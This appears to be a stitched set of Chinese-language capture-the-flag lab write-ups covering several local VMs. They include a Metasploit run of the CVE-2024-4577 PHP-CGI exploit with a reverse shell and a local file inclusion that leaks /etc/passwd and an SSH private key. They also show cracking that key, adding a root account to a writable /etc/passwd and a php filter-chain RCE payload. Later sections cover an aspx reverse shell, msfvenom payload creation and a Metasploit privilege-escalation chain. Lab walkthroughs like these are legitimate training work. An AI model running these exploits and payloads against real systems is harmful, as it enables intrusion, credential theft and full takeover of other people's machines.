rhosts => 192.168.136.134
msf6 exploit(windows/http/php_cgi_arg_injection_rce_cve_2024_4577) > run
[*] Started reverse TCP handler on 192.168.136.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Apache
[*] Command shell session 1 opened (192.168.136.128:4444 -> 192.168.136.134:49741) at 2025-02-26 21:19:33 -0500
直接利用
whoami
dir
cd ..
cd ..
dir
cd Users
dir
cd Administrator
dir
cd Desktop
dir
type user.txt
type root.txt
4dcd00d9b6c66a0eae4a30aa0c781406
af70e9322a562983e01a250ca84fe28d
p4l4nc4
信息搜集
mac地址为08:00:27:6a:2f:23,确定了ip地址为192.168.56.107,然后看一下端口是什么情况
┌──(root㉿kali-plus)-[~]
└─# nmap -p- 192.168.56.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-04 15:23 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.107
Host is up (0.0055s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:6A:2F:23 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds
开了一个22和80,先看看80端口,80端口就是一个web服务,dirsearch扫目录得到一个robots.txt,但是不知道写的啥玩意
80端口渗透-user flag
┌──(root㉿kali-plus)-[~]
└─# curl 192.168.56.107:80/robots.txt
A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo em dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se que a Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação CientÃfica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidências fotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro perÃodo de guerra.
Atualmente, a Palanca Negra Gigante é considerada como o sÃmbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhia aérea angolana, TAAG, tem este antÃlope como sÃmbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antÃlopes, eles simbolizam vivacidade, velocidade, beleza e nitidez visual
┌──(root㉿kali-plus)-[~]
└─# curl 192.168.56.107:80/robots.txt > tmp1
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1432 100 1432 0 0 225k 0 --:--:-- --:--:-- --:--:-- 233k
┌──(root㉿kali-plus)-[~]
└─# cat tmp1
A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo em dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se que a Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação CientÃfica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidências fotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro perÃodo de guerra.
Atualmente, a Palanca Negra Gigante é considerada como o sÃmbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhia aérea angolana, TAAG, tem este antÃlope como sÃmbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antÃlopes, eles simbolizam vivacidade, velocidade, beleza e nitidez visual
又是没见过的思路和方法,脑子痒痒的
┌──(root㉿kali-plus)-[~]
└─# cat tmp1|grep -P '\w+'
A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo e dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se quea Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação CientÃfica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidênciasfotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro perÃodo de guerra.
Atualmente, a Palanca Negra Gigante é considerada como o sÃmbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhi aérea angolana, TAAG, tem este antÃlope como sÃmbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antÃlopes, eles simbolizam vivacidade,velocidade, beleza e nitidez visual
┌──(root㉿kali-plus)-[~]
└─# cat tmp1|grep -P '\w+' -o
cat tmp1|grep -P '\w+'这一条指令中-P 启用 Perl 兼容的正则表达式(PCRE),'\w+' 是正则表达式,用于匹配一个或多个字母数字字符(单词) 这句指令的效果就是把数字、字母、单词、或者是由数字,字母下划线组成的字符给挑选出来,视觉上看起来他们之间是有空格隔开的,下面的指令是
cat tmp1|grep -P '\w+' -o
cat tmp1|grep -P '\w+' -o|sort
cat tmp1|grep -P '\w+' -o|sort|uniq
cat tmp1|grep -P '\w+' -o这一步-o的作用是把正则匹配得到的这些提取出来,提取出来就是一个纵向输出的状态,然后cat tmp1|grep -P '\w+' -o|sort这个命令的作用就是进行一个简单的排列,cat tmp1|grep -P '\w+' -o|sort|uniq是去重,接下来还要生成变体的字典,就是CTF经典变体,比如
i->1
a->4
e->3
l->1
可以找网站换,但是网站换的不太靠谱,最好让ai改或者手动改,手动改的指令为:
cat tmp2|sed -re 's/a/4/gi' -e 's/e/3/gi' -re 's/i|l/1/g'
接下来把修改好的内容打包成txt字典,用gobuster跑
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w a.txt -u http://192.168.56.107 -x.php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.107
[+] Method: GET
[+] Threads: 10
[+] Wordlist: a.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/n3gr4 (Status: 301) [Size: 316] [--> http://192.168.56.107/n3gr4/]
Progress: 298 / 300 (99.33%)
===============================================================
Finished
===============================================================
扫出一个/n3gr4的目录,然后把这个目录放在url后面继续跑,发现扫不出来,看了一眼发现需要转换一下大小写,使用cat a.txt|tr A-Z a-z > b.txt将字典里的大写转换成小写,接着用gobuster跑
然后到这一步发现我并没有跑出来,检查了一下,发现我用kimi转换变体字典,他给我的是错的,无语了kimi智障,那么我们直接用命令生成一个新的字典
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w b1.txt -u http://192.168.56.107/n3gr4/ -x.php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.107/n3gr4/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: b1.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/m414nj3.php (Status: 500) [Size: 0]
===============================================================
Finished
===============================================================
然后就跑出来一个新的目录http://192.168.56.107/n3gr4/m414nj3.php,接着使用wfuzz进行web模糊测试
使用指令 wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.56.107/n3gr4/m414nj3.php?FUZZ=/etc/passwd --hh 0 其中添加--hh 0的目的是隐藏那些响应长度为0,即没有内容返回的响应
┌──(root㉿kali-plus)-[~]
└─# wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.56.107/n3gr4/m414nj3.php?FUZZ=/etc/passwd --hh 0
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.107/n3gr4/m414nj3.php?FUZZ=/etc/passwd
Total requests: 4744
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000003006: 200 22 L 26 W 1066 Ch "page"
Total time: 7.406691
Processed Requests: 4744
Filtered Requests: 4743
Requests/sec.: 640.5019
测试出来时page,访问一下看看
┌──(root㉿kali-plus)-[~]
└─# curl http://192.168.56.107/n3gr4/m414nj3.php?page=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
p4l4nc4:x:1000:1000:p4l4nc4,,,:/home/p4l4nc4:/bin/bash
看到成功返回结果,发现用户,看看能不能读.bashrc,发现可以读,那应该就是任意文件读取了
user flag-方法一
一般user flag都会放在/home/用户/user.txt,试试能不能直接读取
http://192.168.56.107/n3gr4/m414nj3.php?page=/home/p4l4nc4/user.txt
HMV{6cfb952777b95ded50a5be3a4ee9417af7e6dcd1}
成功读取user flag
user flag-方法二
尝试读取一下ssh密钥/home/p4l4nc4/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCvTRnNli
2HLc7wYB9S1mbCAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQCrXZ98DYMr
n/f74/g82lqDkMHkyocXGXn8VaP/N7vD9j5mLSr1uhKGBbxcVm4uGP9k//mmRKlewRl/MZ
nTg0N8MP9vp0O2B9vrwHLz9JekTblv93/VCDpJS78CGkNNOVMRcv2ZB3w7uFm6zxRZxQmH
5HaRNuf795GQSFjybiqmN7Mu78bG/94aQMZZLALYmoyMCYWXGvvHpxRN1dwNsT7If4aNBE
l1HXVrZY1biDOrpJQ7O+eZpD4IKs5/QgKL6w9nBczVcGKkvyms98A5qTa/F43+1CxQE2ng
wPiejJEeJZ0PEkQu3nZTK1k7WpJzVnhpqbHGlwKWbfvMKh27Y2gpAAADwI6Nr+vLoXaEJy
SIRrVjIYFz/C3B17pmpx+lmupFfU6ruVHLE92gweyr9wAd5lxhKX1I6BClhlEoDWkzEBCT
H/4zg2tj84+hzhdVWUy6KaCVbRbuvJYWQNWY4kgfk/3FTnSJFHd+k8CZImN3Xa/9DRVLmg
jytzseFr83bPyOyGSze51kJX4r2ljurDvmcnXfQ4j27zUUmwEKi02VvjLngXbmMnIMDLI3
x/pdFxnyZ0w6wnl/Bg+2gvc54Y2ssMblNMw6HZU4K2TN/c3li3A3hLZsN7QwNIV76X5UeP
dWCOngRsImAmMtyxPKZ0rvYwgDimWunQPy0yJXEPdofL6hrAxFZ6y+jnm+gM7x1fnooSkb
9H5RblfwiOtuTD7bmAu6ApNU0Ul3X2YFPnDLFjo/D0Sj5LcsYDQ+XlTNUwnjHpyMy5VzUz
2vDpiscBd7FpFCHf1lS9bfGMLbhOfdM6TPzpjlOmdRizoVjGCZdXsA4Jg05FpvEFa3KHqM
iJOA9yXhHPROYmOwl5Mu+NTPc+Xbiu7B8TJu/BORoOShhbm7+kQpXM7XHPDKTTnJo+qmsI
Pt9FuQF3wZWIXZ48DmRKJKhB+a9LwuE8ES3wUTVqx/EbAs08V6/uiBYZmorJFSgbPd68AE
xKTK9ObilJKSfS2Ik5/iVIBTUxlAt2foAUpWTlXVNmFfBEhRSk48E8NhcgNqctKWpjKf0R
2gi/Dvpect4LoqKPue5zvN0dNlYSiq/6QK6NqJrJdN7DvsvocL+BcWmmv31erlJOo6A3Zw
CEpmnqVzMTroZSBQv3eEsOFS/+RkJ5ffFRpXGfWPh4Dn/Y++n3wbHNNb97pOd9WV+IlhDV
7btvga8cG9xp3zihOIf308VowcpIp0CSlEqZDBpis5jWY9J3N1+uh3pJHFgqmLxKnqLmzu
u15Kh/+nAV6DTBVxrdhq8HoLAvb7ubAq2ICHALC39X12+J0cLOUMi8UWYawMTFgYnO3ZBD
fb6fZaM9Hr97jREiUEG6vgIcNgn6jtJ3EM3ncxTKe2T8SSYn8pFy9Lqf+lvZ8yo9DkaPl5
ORSVWa+jCKhuClPZY5t8VJC9xXGyz8Wah15Y2pg95nGEub7dgmRlQAIiSxjWsDmaDzIBPo
IkZ5lzxoTvvtL2N1+4ZFprPwUN6y6C6zrXbzQp7Ov0bZc2g9fFiNxu1HvR96rwVNFHbeia
OJEM2NZSUU52PExgYtSXwO5aDy70oKiu0pbifoYOm19hlYwYWOOa6s+oW2FG+aXO8WIeEa
muaZDiXw==
-----END OPENSSH PRIVATE KEY-----
拿到ssh登录的私钥,先使用ssh2john把这个私钥转换成hash格式 ssh2john hash3 >hash4
┌──(root㉿kali-plus)-[~]
└─# ssh2john hash3 > hash4
┌──(root㉿kali-plus)-[~]
└─# john hash4 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
friendster (hash3)
1g 0:00:00:04 DONE (2025-03-04 19:13) 0.2331g/s 149.1p/s 149.1c/s 149.1C/s hockey..pebbles
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
得到ssh登录的密码为:friendster 有了密码直接登录即可
┌──(root㉿kali-plus)-[~]
└─# ssh p4l4nc4@192.168.56.107
The authenticity of host '192.168.56.107 (192.168.56.107)' can't be established.
ED25519 key fingerprint is SHA256:F1H2S93bx6fgnjMCinI5RMZf/XIJS3u8KjLS15lO6rU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.107' (ED25519) to the list of known hosts.
p4l4nc4@192.168.56.107's password:
Linux 4ng014 6.1.0-27-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.115-1 (2024-11-01) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Nov 13 17:10:08 2024 from 192.168.1.78
p4l4nc4@4ng014:~$ ls
user.txt
p4l4nc4@4ng014:~$ cat user.txt
HMV{6cfb952777b95ded50a5be3a4ee9417af7e6dcd1}
提权-root flag
root flag-方法一
查看了一下.bash_history发现/etc/passwd是可写的
ls /etc/passwd
ls -l /etc/passwd
sudo chmod rw-rw-rw- /etc/passwd
sudo chmod rwrwrw /etc/passwd
sudo chmod 666 /etc/passwd
发现/etc/passwd有写入的权限,尝试写入新用户,先用openssl生成一个密码
p4l4nc4@4ng014:~$ openssl passwd 123456
$1$CUWhN2c.$XWgLjjrEAtb3CdDb6Vk5U0
然后使用echo命令追加到/etc/passwd文件中
p4l4nc4@4ng014:~$ echo 'hack:$1$CUWhN2c.$XWgLjjrEAtb3CdDb6Vk5U0:0:0:qwe:/root:/bin/bash' >> /etc/passwd
p4l4nc4@4ng014:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
p4l4nc4:x:1000:1000:p4l4nc4,,,:/home/p4l4nc4:/bin/bash
kn1ght::0:0:::/bin/bash
hack:$1$CUWhN2c.$XWgLjjrEAtb3CdDb6Vk5U0:0:0:qwe:/root:/bin/bash
p4l4nc4@4ng014:~$ su hack
Password:
root@4ng014:/home/p4l4nc4# ls
user.txt
root@4ng014:/home/p4l4nc4# cd /root
root@4ng014:~# ls
root.txt
root@4ng014:~# cat root.txt
HMV{4c3b9d0468240fbd4a9148c8559600fe2f9ad727}
root flag-方法二
方法二使用到两个工具php_filter_chain_generator,linpeas.sh项目地址:https://github.com/synacktiv/php_filter_chain_generator
https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS
可以先用php伪协议http://192.168.56.107/n3gr4/m414nj3.php?page=php://filter/read=convert.base64-encode/resource=m414nj3.php读取源代码
PD9waHAKICAgICRwYWdlID0gJF9HRVRbJ3BhZ2UnXTsKICAgIGluY2x1ZGUoJHBhZ2UpOwo/Pgo=
<?php
$page = $_GET['page'];
include($page);
?>
──(root㉿kali-plus)-[/home/test/Desktop/php_filter_chain_generator]
└─# python3 php_filter_chain_generator.py --chain "<?php system(\$_GET['a']);?>"
[+] The following gadget chain will generate the following code : <?php system($_GET['a']);?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWydhJ10pOz8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
得到这个直接利用,在后面添加&a=id即可查看id,也可以利用busybox wget下载对应的脚本
quoted
信息搜集
mac地址为00:0C:29:26:7C:E2,得到ip地址为192.168.136.137,扫一下端口
┌──(root㉿zss)-[/home/zss]
└─# nmap -p- 192.168.136.137
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-06 19:49 CST
Nmap scan report for bogon (192.168.136.137)
Host is up (0.00077s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 00:0C:29:26:7C:E2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 18.04 seconds
发现这么多端口,再使用nmap -sV -sT -p 21,80,135,139,445,5357 192.168.136.137扫描一下特定的端口 先看看ftp都有啥,登录的时候选择匿名登录即可
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS7</title>
<style type="text/css">
<!--
body {
color:#000000;
background-color:#B3B3B3;
margin:0;
}
#container {
margin-left:auto;
margin-right:auto;
text-align:center;
}
a img {
border:none;
}
-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>
</div>
</body>
</html>
这个应该是80端口的那个网页的代码,发现可以上传木马,然后ftp连进去的目录应该就是网站的那个目录,上传一个木马看看能不能连,通过Wappalyzer发现网站使用的是php编程语言,没注意是asp的框架,所以php木马连不上,找个asp的马传上去看看
user flag
asp木马:
https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx
脚本的内容要修改一下,kali开启监听然后再curl我们上传的aspx文件,等待一会就能监听到,接着就是一顿操作读取user flag
root flag
这里要用到 msfvenom -p windows/meterpreter/reverse_tcp lport=4444 lhost=192.168.136.161 -f exe > shell.exe来生成一个反弹shell的exe,然后将这个shell.exe上传到靶机,然后在靶机中运行shell.exe,等待kali监听,但是监听得到的还不是admin权限,需要提权,先把他放到后台运行,然后使用multi/recon/local_exploit_suggester模块,然后run之后就能找到可利用的模块,接着利用提权
use exploit/milti/handler
show options
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.136.161
run
bg
sessions
use multi/recon/local_exploit_suggester
show options
set session 1
run
use exploit/windows/local/ms16_075_reflection_juicy
set session 1
set lhost 192.168.136.161
run
Nessus
信息搜集
┌──(root?kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.56.101
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:17 (Unknown: locally administered)
192.168.56.100 08:00:27:d2:fb:04 PCS Systemtechnik GmbH
192.168.56.156 08:00:27:4f:9a:15 PCS Systemtechnik GmbH
得到ip地址为192.168.56.156,再扫一下端口
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.56.156 -sV -sT -p 135,139,445,5985,8834,47001,49664
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-10 20:56 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.156
Host is up (0.0025s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
